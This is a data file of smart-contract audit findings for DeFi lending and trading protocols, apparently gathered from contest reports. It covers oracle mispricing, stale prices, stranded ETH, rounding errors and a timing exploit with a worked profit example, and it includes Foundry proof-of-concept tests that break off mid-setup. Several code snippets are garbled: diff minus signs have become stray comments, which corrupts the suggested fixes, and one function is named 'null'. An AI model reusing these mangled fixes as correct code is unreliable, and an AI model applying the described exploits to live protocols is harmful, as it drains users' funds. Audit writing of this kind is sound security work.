The other way around, trading USDT for USD1, would get you 1.01 USD1 for 1 USDT: $1e6 * 1e18 * 1e18 / (0.99e18 * 1e6) = 1.01e18$\\nThe contract values USD1 at exactly $1 while USDT's price is variable. But, in reality, USD1 is not pegged to $1. It's pegged to USDT the only underlying asset.\\nThat allows us to do the following:\\nWith USDT back to $1 we get: $1.003009e+23 * 1e18 * 1e6 / (1e18 * 1e18) = 100300.9e6$\\nThat's a profit of 300 USDT. The profit is taken from other users of the protocol who deposited USDT to get access to the other stablecoins.ч1 USDT should always be 1 USD1. You treat 1 USD1 as $1 but that's not the case.чAn attacker can abuse the price variation of USDT to buy USD1 for cheap.ч```\\n address priceQuoteToken = _getPriceQuoteToken(tokenIn, tokenOut);\\n price = oracle.getLatestPrice(priceQuoteToken);\\n _checkPrice(priceQuoteToken, price);\\n\\n feeNumerator = isBuy ? pair.buyFee : pair.sellFee;\\n feeToken = IERC20Token(priceQuoteToken == tokenIn ? tokenOut : tokenIn);\\n\\n SwapRequest memory request;\\n request.tokenIn = tokenIn;\\n request.tokenOut = tokenOut;\\n request.amountType = amountType;\\n request.amount = amount;\\n request.feeNumerator = feeNumerator;\\n request.feeBase = tokenManager.SWAP_FEE_BASE();\\n request.feeToken = address(feeToken);\\n request.price = price;\\n request.priceBase = 10 ** oracle.decimals();\\n request.quoteToken = priceQuoteToken;\\n\\n (amountIn, amountOut, fee) = _calculateSwapResult(request);\\n```\\n -Users may not be able to fully redeem USD1 into USDT even when reserve ratio is above 100%чmediumчUsers may not be able to fully redeem USDT even when reserve ratio is above 100%, because of portfolio being taken into the account for calculation.\\nReserve ratio shows how many liabilities is covered by reserves, a reserve ratio above 100% guarantees protocol has enough USDT to redeem, the way of calculating reserve ratio is `Reserve Ratio = allReserves / liabilities` and is implemented in 
Unitas#_getReserveStatus(...) function:\\n```\\n reserveRatio = ScalingUtils.scaleByBases(\\n allReserves * valueBase / liabilities,\\n valueBase,\\n tokenManager.RESERVE_RATIO_BASE()\\n );\\n```\\n\\n`allReserves` is the sum of the balance of Unitas and InsurancePool, calculated in Unitas#_getTotalReservesAndCollaterals() function:\\n```\\n for (uint256 i; i < tokenCount; i++) {\\n address token = tokenManager.tokenByIndex(tokenTypeValue, i);\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n\\n\\n if (tokenReserve > 0 || tokenCollateral > 0) {\\n uint256 price = oracle.getLatestPrice(token);\\n\\n\\n reserves += _convert(\\n token,\\n baseToken,\\n tokenReserve,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n\\n\\n collaterals += _convert(\\n token,\\n baseToken,\\n tokenCollateral,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n }\\n }\\n```\\n\\n`liabilities` is the total value of USD1 and USDEMC tokens, calculated in Unitas#_getTotalLiabilities() function:\\n```\\n for (uint256 i; i < tokenCount; i++) {\\n address token = tokenManager.tokenByIndex(tokenTypeValue, i);\\n uint256 tokenSupply = IERC20Token(token).totalSupply();\\n\\n\\n if (token == baseToken) {\\n // Adds up directly when the token is USD1\\n liabilities += tokenSupply;\\n } else if (tokenSupply > 0) {\\n uint256 price = oracle.getLatestPrice(token);\\n\\n\\n liabilities += _convert(\\n token,\\n baseToken,\\n tokenSupply,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n }\\n }\\n```\\n\\nSome amount of USDT in both Unitas and InsurancePool is `portfolio`, which represents the current amount of assets used for strategic investments, it is worth noting that after sending `portfolio`, `balance` remains the same, which means `portfolio` is taken into account in the calculation of reserve ratio.\\nThis is problematic because `portfolio` is 
not available when user redeems, and user may not be able to fully redeem for USDT even when protocols says there is sufficient reserve ratio.\\nLet's assume :\\nUnitas's balance is 10000 USD and its portfolio is 2000 USD, avaliable balance is 8000 USD InsurancePool's balance is 3000 USD and its portfolio is 600 USD, available balance is 2400 USD AllReserves value is 13000 USD Liabilities (USDEMC) value is 10000 USD Reserve Ratio is (10000 + 3000) / 10000 = 130%.\\nLater on, USDEMC appreciates upto 10% and we can get:\\nAllReserves value is still 13000 USD Liabilities (USDEMC) value is 11000 USD Reserve Ratio is (10000 + 3000) / 11000 = 118%.\\nThe available balance in Unitas is 8000 USD so there is 3000 USD in short, it needs to be obtain from InsurancePool, however, the available balance in InsurancePool is 2400 USD, transaction will be reverted and users cannot redeem.\\nThere would also be an extreme situation when reserve ratio is above 100% but there is no available `balance` in protocol because all the `balance` is `portfolio` (this is possible when InsurancePool is drained out), users cannot redeem any USDT in this case.чPortfolio should not be taken into account for the calculation of reserve ratio.\\n```\\n function _getTotalReservesAndCollaterals() internal view returns (uint256 reserves, uint256 collaterals) {\\n // rest of code\\n// Remove the line below\\n uint256 tokenReserve = _getBalance(token);\\n// Add the line below\\n uint256 tokenReserve = _getBalance(token) // Remove the line below\\n _getPortfolio(token);\\n// Remove the line below\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n// Add the line below\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token) // Remove the line below\\n IInsurancePool(insurancePool).getPortfolio(token);\\n // rest of code\\n }\\n```\\nчUsers may not be able to fully redeem USD1 into USDT even when reserve ratio is above 100%, this defeats the purpose of 
reserve ratio and breaks the promise of the protocol, users may be mislead and lose funds.ч```\\n reserveRatio = ScalingUtils.scaleByBases(\\n allReserves * valueBase / liabilities,\\n valueBase,\\n tokenManager.RESERVE_RATIO_BASE()\\n );\\n```\\n -If any stable depegs, oracle will fail, disabling swapsчmediumчIf any stable depegs, oracle will fail, disabling swaps\\nWhen swapping, the price of the asset/stable is fetched from OracleX. After fetching the price, the deviation is checked in the `_checkPrice` function.\\nIf the price of an asset/stable depegs, the following require will fail:\\n```\\n _require(minPrice <= price && price <= maxPrice, Errors.PRICE_INVALID);\\n```\\n\\nDue to the fail in the deviation, any swapping activity will be disabled by default and transactions will not go throughчUse a secondary oracle when the first one fails and wrap the code in a try catch and store the last fetched price in a variableчCore functionality of the protocol will fail to work if any token they fetch depegs and its price goes outside the bounds.ч```\\n _require(minPrice <= price && price <= maxPrice, Errors.PRICE_INVALID);\\n```\\n -supplyNativeToken will strand ETH in contract if called after ACTION_DEFER_LIQUIDITY_CHECKчhighчsupplyNativeToken deposits msg.value to the WETH contract. This is very problematic if it is called after ACTION_DEFER_LIQUIDITY_CHECK. Since onDeferredLiqudityCheck creates a new context msg.value will be 0 and no ETH will actually be deposited for the user, causing funds to be stranded in the contract.\\nTxBuilderExtension.sol#L252-L256\\n```\\nfunction supplyNativeToken(address user) internal nonReentrant {\\n WethInterface(weth).deposit{value: msg.value}();\\n IERC20(weth).safeIncreaseAllowance(address(ironBank), msg.value);\\n ironBank.supply(address(this), user, weth, msg.value);\\n}\\n```\\n\\nsupplyNativeToken uses the context sensitive msg.value to determine how much ETH to send to convert to WETH. 
After ACTION_DEFER_LIQUIDITY_CHECK is called, it enters a new context in which msg.value is always 0. We can outline the execution path to see where this happens:\\n`execute > executeInternal > deferLiquidityCheck > ironBank.deferLiquidityCheck > onDeferredLiquidityCheck (new context) > executeInternal > supplyNativeToken`\\nWhen IronBank makes its callback to TxBuilderExtension it creates a new context. Since the ETH is not sent along to this new context, msg.value will always be 0. This will result in no ETH being deposited and the sent ether is left in the contract.\\nAlthough these funds can be recovered by the admin, it may easily cause the user to be unfairly liquidated in the meantime since a (potentially significant) portion of their collateral hasn't been deposited. Additionally in conjunction with my other submission on ownable not being initialized correctly, the funds would be completely unrecoverable due to lack of owner.чmsg.value should be cached at the beginning of the function to preserve it across contextsчUser funds are indefinitely (potentially permanently) stuck in the contract. Users may be unfairly liquidated due to their collateral not depositing.ч```\\nfunction supplyNativeToken(address user) internal nonReentrant {\\n WethInterface(weth).deposit{value: msg.value}();\\n IERC20(weth).safeIncreaseAllowance(address(ironBank), msg.value);\\n ironBank.supply(address(this), user, weth, msg.value);\\n}\\n```\\n -PriceOracle.getPrice doesn't check for stale priceчmediumчPriceOracle.getPrice doesn't check for stale price.
As a result, the protocol can make decisions based on out-of-date prices, which can cause losses.\\n```\\n function getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, "invalid price");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n }\\n```\\n\\nThis function doesn't check that prices are up to date. Because of that it's possible that the price is outdated, which can cause financial losses for the protocol.чYou need to check that price is not outdated by checking round timestamp.чProtocol can face bad debt.ч```\\n function getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, "invalid price");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n }\\n```\\n -PriceOracle will use the wrong price if the Chainlink registry returns price outside min/max rangeчmediumчChainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow a user to continue borrowing with the asset but at the wrong price.
This is exactly what happened to Venus on BSC when LUNA imploded.\\nNote there is only a check for `price` to be positive, and not within an acceptable range.\\n```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, "invalid price");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\n\\nA similar issue is seen here.чImplement the proper check for each asset. It must revert in the case of bad price.\\n```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price >= minPrice && price <= maxPrice, "invalid price"); // @audit use the proper minPrice and maxPrice for each asset\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\nчThe wrong price may be returned in the event of a market crash. An adversary will then be able to borrow against the wrong price and incur bad debt to the protocol.ч```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, "invalid price");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\n -Wrong Price will be Returned When Asset is PToken for WstETHчmediumчIron Bank allows a PToken market to be created for an underlying asset in addition to a lending market. PTokens can be counted as user collaterals and their price is fetched based on their underlying tokens. However, a wrong price will be returned when PToken's underlying asset is WstETH.\\nRetrieving price for WstETH is a 2 step process.
WstETH needs to be converted to stETH first, then converted to ETH/USD. This is properly implemented when the market is WstETH through checking `if (asset==wsteth)`. But when PToken market is created for WstETH, this check will by bypassed because PToken contract address will be different from wsteth address.\\nPToken market price is set through `_setAggregators()` in PriceOracle.sol where base and quote token address are set and tested before writing into `aggregators` array. And note that quote token address can either be ETH or USD. When asset price is accessed through `getPrice()`, if the input asset is not `wsteth` address, `aggregators` is directly pulled to get chainlink price denominated in ETH or USD.\\n```\\n//PriceOracle.sol\\n//_setAggregators()\\n require(\\n aggrs[i].quote == Denominations.ETH ||\\n aggrs[i].quote == Denominations.USD,\\n \"unsupported quote\"\\n );\\n```\\n\\n```\\n//PriceOracle.sol\\n function getPrice(address asset) external view returns (uint256) {\\n if (asset == wsteth) {\\n uint256 stEthPrice = getPriceFromChainlink(\\n steth,\\n Denominations.USD\\n );\\n uint256 stEthPerToken = WstEthInterface(wsteth).stEthPerToken();\\n uint256 wstEthPrice = (stEthPrice * stEthPerToken) / 1e18;\\n return getNormalizedPrice(wstEthPrice, asset);\\n }\\n AggregatorInfo memory aggregatorInfo = aggregators[asset];\\n uint256 price = getPriceFromChainlink(\\n aggregatorInfo.base,\\n aggregatorInfo.quote\\n );\\n // rest of code\\n```\\n\\nThis creates a problem for PToken for WstETH, because `if (asset==wsteth)` will be bypassed and chainlink aggregator price will be returned. And chainlink doesn't have a direct price quote of WstETH/ETH or WstETH/USD, only WstETH/stETH or stETH/USD. 
This means most likely aggregator price for stETH/USD will be returned as price for WstETH.\\nSince stETH is a rebasing token, and WstETH:stETH is not 1 to 1, this will create a wrong valuation for users holding PToken for WstETH as collaterals.чIn `getPrice()`, consider adding another check whether the asset is PToken and its underlying asset is WstETH. If true, use the same bypass for pricing.чSince users holding PToken for WstETH will have wrong valuation, this potentially creates opportunities for malicious over-borrowing or unfair liquidations, putting the protocol at risk.ч```\\n//PriceOracle.sol\\n//_setAggregators()\\n require(\\n aggrs[i].quote == Denominations.ETH ||\\n aggrs[i].quote == Denominations.USD,\\n \"unsupported quote\"\\n );\\n```\\n -Limit swap orders can be used to get a free look into the futureчhighчUsers can cancel their limit swap orders to get a free look into prices in future blocks\\nThis is a part of the same issue that was described in the last contest. The sponsor fixed the bug for `LimitDecrease` and `StopLossDecrease`, but not for `LimitSwap`.\\nAny swap limit order submitted in block range N can't be executed until block range N+2, because the block range is forced to be after the submitted block range, and keepers can't execute until the price has been archived, which necessarily won't be until after block range N+1. Consider what happens when half of the oracle's block ranges are off from the other half, e.g.:\\n```\\n 1 2 3 4 5 6 7 8 9 < block number\\nO1: A B B B B C C C D\\nA A B B B B C C C\\n^^ grouped oracle block ranges\\n```\\n\\nAt block 1, oracles in both groups (O1 and O2) are in the same block range A, and someone submits a large swap limit order (N). At block 6, oracles in O1 are in N+2, but oracles in O2 are still in N+1. 
This means that the swap limit order will execute at the median price of block 5 (since the earliest group to have archive prices at block 6 for N+1 will be O1) and market swap order submitted at block 6 in the other direction will execute at the median price of block 6 since O2 will be the first group to archive a price range that will contain block 6. By the end of block 5, the price for O1 is known, and the price that O2 will get at block 6 can be predicted with high probability (e.g. if the price has just gapped a few cents), so a trader will know whether the two orders will create a profit or not. If a profit is expected, they'll submit the market order at block 6. If a loss is expected, they'll cancel the swap limit order from block 1, and only have to cover gas fees.\\nEssentially the logic is that limit swap orders will use earlier prices, and market orders (with swaps) will use later prices, and since oracle block ranges aren't fixed, an attacker is able to know both prices before having their orders executed, and use large order sizes to capitalize on small price differences.чIssue Limit swap orders can be used to get a free look into the future\\nAll orders should follow the same block range rulesчThere is a lot of work involved in calculating statistics about block ranges for oracles and their processing time/queues, and ensuring one gets the prices essentially when the keepers do, but this is likely less work than co-located high frequency traders in traditional finance have to do, and if there's a risk free profit to be made, they'll put in the work to do it every single time, at the expense of all other traders.ч```\\n 1 2 3 4 5 6 7 8 9 < block number\\nO1: A B B B B C C C D\\nA A B B B B C C C\\n^^ grouped oracle block ranges\\n```\\n -User can loose funds in case if swapping in DecreaseOrderUtils.processOrder will failчmediumчWhen user executes decrease order, then he provides `order.minOutputAmount` value, that should protect his from loses. 
This value is provided with hope that swapping that will take some fees will be executed. But in case if swapping will fail, then this `order.minOutputAmount` value will be smaller then user would like to receive in case when swapping didn't occur. Because of that user can receive less output amount.\\n`DecreaseOrderUtils.processOrder` function executed decrease order and returns order execution result which contains information about output tokens and amounts that user should receive.\\n```\\n try params.contracts.swapHandler.swap(\\n SwapUtils.SwapParams(\\n params.contracts.dataStore,\\n params.contracts.eventEmitter,\\n params.contracts.oracle,\\n Bank(payable(order.market())),\\n params.key,\\n result.outputToken,\\n result.outputAmount,\\n params.swapPathMarkets,\\n 0,\\n order.receiver(),\\n order.uiFeeReceiver(),\\n order.shouldUnwrapNativeToken()\\n )\\n ) returns (address tokenOut, uint256 swapOutputAmount) {\\n `(\\n params.contracts.oracle,\\n tokenOut,\\n swapOutputAmount,\\n order.minOutputAmount()\\n );\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n _handleSwapError(\\n params.contracts.oracle,\\n order,\\n result,\\n reason,\\n reasonBytes\\n );\\n }\\n }\\n```\\n\\n```\\n null(\\n Oracle oracle,\\n Order.Props memory order,\\n DecreasePositionUtils.DecreasePositionResult memory result,\\n string memory reason,\\n bytes memory reasonBytes\\n ) internal {\\n emit SwapUtils.SwapReverted(reason, reasonBytes);\\n\\n _validateOutputAmount(\\n oracle,\\n result.outputToken,\\n result.outputAmount,\\n order.minOutputAmount()\\n );\\n\\n MarketToken(payable(order.market())).transferOut(\\n result.outputToken,\\n order.receiver(),\\n result.outputAmount,\\n order.shouldUnwrapNativeToken()\\n );\\n }\\n```\\n\\nAs you can see in this case `_validateOutputAmount` function will be called as well, but it will be called with `result.outputAmount` this time, which is 
amount provided by decreasing of position.\\nNow I will describe the problem. In case if user wants to swap his token, he knows that he needs to pay fees to the market pools and that this swap will eat some amount of output. So in case if `result.outputAmount` is 100$ worth of tokenA, it's fine if user will provide slippage as 3% if he has long swap path, so his slippage is 97$. But in case when swap will fail, then now this slippage of 97$ is incorrect as user didn't do swapping and he should receive exactly 100$ worth of tokenA.\\nAlso I should note here, that it's easy to make swap fail for keeper, it's enough for him to just not provide any asset price, so swap reverts. So keeper can benefit on this slippage issue.чIssue User can lose funds in case if swapping in DecreaseOrderUtils.processOrder will fail\\nMaybe it's needed to have another slippage param, that should be used in case of no swapping.чUser can be front-run to receive less amount in case of swapping error.ч```\\n try params.contracts.swapHandler.swap(\\n SwapUtils.SwapParams(\\n params.contracts.dataStore,\\n params.contracts.eventEmitter,\\n params.contracts.oracle,\\n Bank(payable(order.market())),\\n params.key,\\n result.outputToken,\\n result.outputAmount,\\n params.swapPathMarkets,\\n 0,\\n order.receiver(),\\n order.uiFeeReceiver(),\\n order.shouldUnwrapNativeToken()\\n )\\n ) returns (address tokenOut, uint256 swapOutputAmount) {\\n `(\\n params.contracts.oracle,\\n tokenOut,\\n swapOutputAmount,\\n order.minOutputAmount()\\n );\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n _handleSwapError(\\n params.contracts.oracle,\\n order,\\n result,\\n reason,\\n reasonBytes\\n );\\n }\\n }\\n```\\n -MarketUtils.getFundingAmountPerSizeDelta() has a rounding logical error.чmediumч`MarketUtils.getFundingAmountPerSizeDelta()` has a rounding logical error.
The main problem is the divisor always use a roundupDivision regardless of the input `roundUp` rounding mode. Actually the correct use should be: the divisor should use the opposite of `roundup` to achieve the same logic of rounding.\\n`MarketUtils.getFundingAmountPerSizeDelta()` is used to calculate the `FundingAmountPerSizeDelta` with a roundup input mode parameter.\\nThis function is used for example by the IncreaseLimit order via flow `OrderHandler.executeOrder() -> _executeOrder() -> OrderUtils.executeOrder() -> processOrder() -> IncreaseOrderUtils.processOrder() -> IncreasePositionUtils.increasePosition() -> PositionUtils.updateFundingAndBorrowingState() -> MarketUtils.updateFundingAmoutPerSize() -> getFundingAmountPerSizeDelta()`.\\nHowever, the main problem is the divisor always use a roundupDivision regardless of the input `roundUp` rounding mode. Actually the correct use should be: the divisor should use the opposite of `roundup` to achieve the same logic of rounding.\\nMy POC code confirms my finding: given fundingAmount = 2e15, openInterest = 1e15+1, and roundup = true, the correct answer should be: 1999999999999998000000000000001999999999999999. However, the implementation returns the wrong solution of : 1000000000000000000000000000000000000000000000. The reason is that the divisor uses a roundup and gets a divisor of 2, as a result, the final result is actually rounded down rather than rounding up!\\n```\\nfunction testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(\"result: %d\", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(\"correctResult: %d\", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n```\\nчChange the rounding mode of the divisor to the opposite of the input `roundup` mode. 
Or, the solution can be just as follows:\\n```\\nfunction getFundingAmountPerSizeDelta(\\n uint256 fundingAmount,\\n uint256 openInterest,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n if (fundingAmount == 0 || openInterest == 0) { return 0; }\\n \\n \\n\\n // how many units in openInterest\\n// Remove the line below\\n uint256 divisor = Calc.roundUpDivision(openInterest, Precision.FLOAT_PRECISION_SQRT);\\n\\n// Remove the line below\\n return Precision.toFactor(fundingAmount, divisor, roundUp);\\n// Add the line below\\n return Precision.toFactor(fundingAmount*Precision.FLOAT_PRECISION_SQRT, openInterest, roundUp\\n }\\n```\\nчMarketUtils.getFundingAmountPerSizeDelta() has a rounding logical error, sometimes, when roundup = true, the result, instead of rounding up, it becomes a rounding down!ч```\\nfunction testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(\"result: %d\", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(\"correctResult: %d\", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n```\\n -PositionUtils.validatePosition() uses ``isIncrease`` instead of ``false`` when calling isPositionLiquidatable(), making it not work properly for the case of ``isIncrease = true``.чmediumч`PositionUtils.validatePosition()` uses `isIncrease` instead of `false` when calling `isPositionLiquidatable()`, making it not work properly for the case of `isIncrease` = true. The main problem is that when calling `isPositionLiquidatable()`, we should always consider decreasing the position since we are proposing a liquidation trade (which is a decrease in position). Therefore, it should not use `isIncrease` for the input parameter for `isPositionLiquidatable()`. 
We should always use `false` instead.\\n`PositionUtils.validatePosition()` is called to validate whether a position is valid in both collateral size and position size, and in addition, to check if the position is liquidable:\\nIt calls function `isPositionLiquidatable()` to check if a position is liquidable. However, it passes the `isIncrease` to function `isPositionLiquidatable()` as an argument. Actually, the `false` value should always be used for calling function `isPositionLiquidatable()` since a liquidation is always a decrease position operation. A position is liquidable or not has nothing to do with exiting trade operations and only depend on the parameters of the position per se.\\nCurrent implementation has a problem for an increase order: Given a Increase order, for example, increase a position by $200, when `PositionUtils.validatePosition()` is called, which is after the position has been increased, we should not consider another $200 increase in `isPositionLiquidatable()` again as part of the price impact calculation. This is double-accouting for price impact calculation, one during the position increasing process, and another in the position validation process. On the other hand, if we use `false` here, then we are considering a decrease order (since a liquidation is a decrease order) and evaluate the hypothetical price impact if the position will be liquidated.\\nOur POC code confirms my finding: intially, we don't have any positions, after executing a LimitIncrease order, the priceImpactUsd is evaluaed as follows (notice initialDiffUsd = 0):\\nPositionPricingUtils.getPriceImpactUsd started... 
openInterestParams.longOpenInterest: 0 openInterestParams.shortOpenInterest: 0 initialDiffUsd: 0 nextDiffUsd: 1123456700000000000000000000000 positiveImpactFactor: 50000000000000000000000 negativeImpactFactor: 100000000000000000000000 positiveImpactUsd: 0 negativeImpactUsd: 63107747838744499100000 deltaDiffUsd: 63107747838744499100000 priceImpactUsd: -63107747838744499100000 PositionPricingUtils.getPriceImpactUsd() completed. Initial priceImpactUsd: -63107747838744499100000 Capped priceImpactUsd: -63107747838744499100000\\nThen, during validation, when `PositionUtils.validatePosition()` is called, the double accouting occurs, notice the `nextDiffUsd` is doubled, as if the limitOrder was executed for another time!\\nPositionPricingUtils.getPriceImpactUsd started... openInterestParams.longOpenInterest: 1123456700000000000000000000000 openInterestParams.shortOpenInterest: 0 initialDiffUsd: 1123456700000000000000000000000 nextDiffUsd: 2246913400000000000000000000000 impactFactor: 100000000000000000000000 impactExponentFactor: 2000000000000000000000000000000 deltaDiffUsd: 189323243516233497450000 priceImpactUsd: -189323243516233497450000 priceImpactUsd: -189323243516233497450000 adjusted 2: priceImpactUsd: 0\\nThe POC code is as follows, pay attention to the `testLimit()` and the execution of `createLimitIncreaseOrder()`. 
Please comment out the checks for signature, timestamp and block number for oracle price in the source code to run the testing smoothly without revert.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../contracts/role/RoleStore.sol\";\\nimport \"../contracts/router/ExchangeRouter.sol\";\\nimport \"../contracts/data/DataStore.sol\";\\nimport \"../contracts/referral/ReferralStorage.sol\";\\n\\nimport \"../contracts/token/IWNT.sol\";\\nimport \"../contracts/token/WNT.sol\";\\nimport \"../contracts/token/SOLToken.sol\";\\nimport \"../contracts/token/USDC.sol\";\\nimport \"../contracts/token/tokenA.sol\";\\nimport \"../contracts/token/tokenB.sol\";\\nimport \"../contracts/token/tokenC.sol\";\\n\\nimport \"../contracts/market/MarketFactory.sol\";\\nimport \"../contracts/deposit/DepositUtils.sol\";\\nimport \"../contracts/oracle/OracleUtils.sol\";\\nimport \"@openzeppelin/contracts/utils/introspection/ERC165Checker.sol\";\\nimport \"../contracts/withdrawal/WithdrawalUtils.sol\";\\nimport \"../contracts/order/Order.sol\";\\nimport \"../contracts/order/BaseOrderUtils.sol\";\\nimport \"../contracts/price/Price.sol\";\\nimport \"../contracts/utils/Debug.sol\";\\nimport \"../contracts/position/Position.sol\";\\nimport \"../contracts/exchange/LiquidationHandler.sol\";\\nimport \"../contracts/utils/Calc.sol\";\\nimport \"@openzeppelin/contracts/utils/math/SignedMath.sol\";\\nimport \"@openzeppelin/contracts/utils/math/SafeCast.sol\";\\n\\n\\ncontract CounterTest is Test, Debug{\\n using SignedMath for int256;\\n using SafeCast for uint256;\\n\\n\\n WNT _wnt; \\n USDC _usdc;\\n SOLToken _sol;\\n tokenA _tokenA;\\n tokenB _tokenB;\\n tokenC _tokenC;\\n\\n RoleStore _roleStore;\\n Router _router;\\n DataStore _dataStore;\\n EventEmitter _eventEmitter;\\n DepositVault _depositVault;\\n OracleStore _oracleStore; \\n Oracle _oracle;\\n DepositHandler _depositHandler;\\n WithdrawalVault _withdrawalVault;\\n 
WithdrawalHandler _withdrawalHandler;\\n OrderHandler _orderHandler;\\n SwapHandler _swapHandler;\\n LiquidationHandler _liquidationHandler;\\n ReferralStorage _referralStorage;\\n OrderVault _orderVault;\\n ExchangeRouter _erouter;\\n MarketFactory _marketFactory;\\n Market.Props _marketProps1;\\n Market.Props _marketPropsAB;\\n Market.Props _marketPropsBC;\\n Market.Props _marketPropsCwnt;\\n \\n \\n address depositor1;\\n address depositor2;\\n address depositor3;\\n address uiFeeReceiver = address(333);\\n\\n\\n function testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(\"result: %d\", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(\"correctResult: %d\", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n\\n \\n\\n function setUp() public {\\n _wnt = new WNT();\\n _usdc = new USDC();\\n _sol = new SOLToken();\\n _tokenA = new tokenA();\\n _tokenB = new tokenB();\\n _tokenC = new tokenC();\\n \\n\\n\\n _roleStore = new RoleStore();\\n _router = new Router(_roleStore);\\n _dataStore = new DataStore(_roleStore);\\n \\n _eventEmitter= new EventEmitter(_roleStore);\\n _depositVault = new DepositVault(_roleStore, _dataStore);\\n _oracleStore = new OracleStore(_roleStore, _eventEmitter);\\n _oracle = new Oracle(_roleStore, _oracleStore);\\n console2.logString(\"_oracle:\"); console2.logAddress(address(_oracle));\\n \\n _depositHandler = new DepositHandler(_roleStore, _dataStore, _eventEmitter, _depositVault, _oracle);\\n console2.logString(\"_depositHandler:\"); console2.logAddress(address(_depositHandler));\\n \\n\\n _withdrawalVault = new WithdrawalVault(_roleStore, _dataStore);\\n _withdrawalHandler = new WithdrawalHandler(_roleStore, _dataStore, _eventEmitter, _withdrawalVault, _oracle);\\n \\n \\n _swapHandler = new SwapHandler(_roleStore);\\n _orderVault = new 
OrderVault(_roleStore, _dataStore);\\n _referralStorage = new ReferralStorage();\\n\\n\\n \\n _orderHandler = new OrderHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage); \\n _erouter = new ExchangeRouter(_router, _roleStore, _dataStore, _eventEmitter, _depositHandler, _withdrawalHandler, _orderHandler);\\n console2.logString(\"_erouter:\"); console2.logAddress(address(_erouter));\\n _liquidationHandler = new LiquidationHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage);\\n \\n _referralStorage.setHandler(address(_orderHandler), true); \\n\\n /* set myself as the controller so that I can set the address of WNT (wrapped native token contracdt) */\\n _roleStore.grantRole(address(this), Role.CONTROLLER);\\n _roleStore.grantRole(address(this), Role.MARKET_KEEPER);\\n \\n _dataStore.setUint(Keys.MAX_SWAP_PATH_LENGTH, 5); // at most 5 markets in the path\\n \\n _dataStore.setAddress(Keys.WNT, address(_wnt));\\n\\n /* set the token transfer gas limit for wnt as 3200 */\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n \\n\\n /* create a market (SQL, WNT, ETH, USDC) */\\n _marketFactory = new MarketFactory(_roleStore, _dataStore, _eventEmitter);\\n console2.logString(\"_marketFactory:\"); console2.logAddress(address(_marketFactory));\\n _roleStore.grantRole(address(_marketFactory), Role.CONTROLLER); // to save a market's props\\n _roleStore.grantRole(address(_erouter), Role.CONTROLLER); \\n _roleStore.grantRole(address(_depositHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_withdrawalHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_swapHandler), Role.CONTROLLER);\\n _roleStore.grantRole(address(_orderHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_liquidationHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_oracleStore), 
